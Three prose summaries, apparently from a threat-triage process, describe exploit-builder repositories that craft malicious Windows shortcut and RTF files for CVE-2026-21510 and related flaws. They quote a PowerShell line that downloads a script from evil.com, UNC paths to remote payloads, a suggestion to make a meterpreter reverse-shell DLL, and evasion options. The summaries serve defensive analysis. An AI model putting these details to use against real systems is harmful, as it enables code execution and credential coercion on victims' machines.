Windows Shell SmartScreen and Security Prompt Bypass via Malicious LNK/Link

Repository is a small standalone Python exploit generator consisting primarily of one large script, lnkstomperpoint.py, plus a README and .gitignore. The script is not a scanner or detector; it is an offensive utility that programmatically builds crafted Windows .lnk files purportedly targeting CVE-2026-21510, a Windows Shell Link remote code execution issue. Based on the visible code and README, its core purpose is to generate malicious shortcut files with attacker-controlled target executable, arguments, working directory, and multiple Shell Link ExtraData structures. Main capabilities described and partially evidenced in code include: LNK stomping variants, manipulation of Shell Link flags and CLSIDs, KnownFolder and PropertyStore data block generation, environment variable blocks, argument obfuscation, optional embedded payload handling, AES encryption support via pycryptodome, anti-forensics options, randomized metadata/CLSID/KnownFolder values, and generation of multiple variants for signature evasion. The script imports AES, padding, random byte generation, struct handling, and logging, indicating real implementation effort rather than a placeholder. Logging is configured to write to cve_2026_21510_ultimate_absolute.log. The visible tail of the script shows a CLI workflow that instantiates an exploit object with many offensive options and writes a generated .lnk file. The README documents extensive CLI options such as --target, --args, --output, --working-dir, --embed-payload, --encrypt-payload, --anti-forensics, --randomize-clsid, --randomize-known-folder, --obfuscate-arguments, and --generate-variants. Example usage demonstrates launching cmd.exe with /c calc.exe, embedding a payload file, and using powershell.exe with a Net.WebClient DownloadString call to retrieve a remote script from http://evil.com/shellcode.ps1. That example introduces a clear web/network-capable second stage, although the generator itself mainly produces a file-based initial vector. Overall, this repository is a standalone operational exploit builder for malicious Windows shortcut generation. Its structure is simple, but the single Python file appears feature-rich and focused on producing obfuscated, evasive .lnk payloads for execution on Windows targets.

This repository is a small exploit-builder project with 4 files: a license, a README, and two Python scripts. It is not a scanner or detector; it generates malicious artifacts for a document-based exploit chain targeting CVE-2026-21514 and CVE-2026-21510. Structure and purpose: - README.md documents the intended exploit chain and experimentation notes. It describes a Protected View/SBX bypass component and an RCE component, including CLSID changes, XML/object changes, and possible DLL-to-CPL substitution. - gen_rtf.py builds exploit.rtf by inserting a UTF-16-style null-padded UNC/WebDAV path into a large hardcoded RTF/OLE blob. The embedded path is \\127.0.0.1@80/final.lnk, indicating the document is meant to cause retrieval of a remote LNK over port 80 via WebDAV-like UNC syntax. - make_lnk.py builds final.lnk from hardcoded hex templates plus a null-padded remote payload path. The referenced payload path is \\127.0.0.1\cc.dll. The script comments explicitly suggest generating the DLL with msfvenom using windows/meterpreter/reverse_tcp. Main exploit capabilities: - Generates a malicious RTF lure document. - Embeds a remote UNC/WebDAV path to a malicious LNK file. - Generates a malicious LNK that references a remote DLL payload over SMB/UNC. - Includes embedded HTML/JavaScript/ActiveX logic inside the LNK data, apparently to trigger file/URL handling and object loading behavior. - Supports straightforward operator customization by changing the hardcoded remote paths and replacing the DLL payload. Operationally, this is an exploit builder rather than a full delivery framework. The payload is basic and hardcoded, so OPERATIONAL is the best fit rather than WEAPONIZED. The code is clearly intended to achieve code execution on a vulnerable Windows/Office target by chaining remote file retrieval and DLL loading.

Repository contains a single Python proof-of-concept script and a detailed README. The main file, CVE-2026-32202.py, is a research-oriented generator for crafted Windows .lnk files that reproduce the LinkTargetIDList structure associated with CVE-2026-21510 / CVE-2026-32202. The script reconstructs three shell items: (1) a Control Panel root CLSID item, (2) an 'All Control Panel Items' category item, and (3) a Unicode _IDCONTROLW structure containing a user-supplied module path, typically a UNC path to a remote .cpl file. It exposes CLI options for the embedded UNC/local path, output filename, applet ID, display name, infotip, and optional hex dump suppression. The exploit capability is file generation rather than direct network communication; however, the generated LNK is intended to cause Windows Explorer/shell32 to access the embedded UNC path during rendering, which can coerce outbound SMB authentication or connection to an attacker-controlled share. The README provides reverse-engineering context, structure layouts, call-chain analysis, and explains that the vulnerable behavior occurs before later trust verification stages. Overall, this is a focused PoC/research tool for crafting malicious shortcut files to reproduce Windows shell path-resolution behavior, not a full weaponized framework or post-exploitation implant.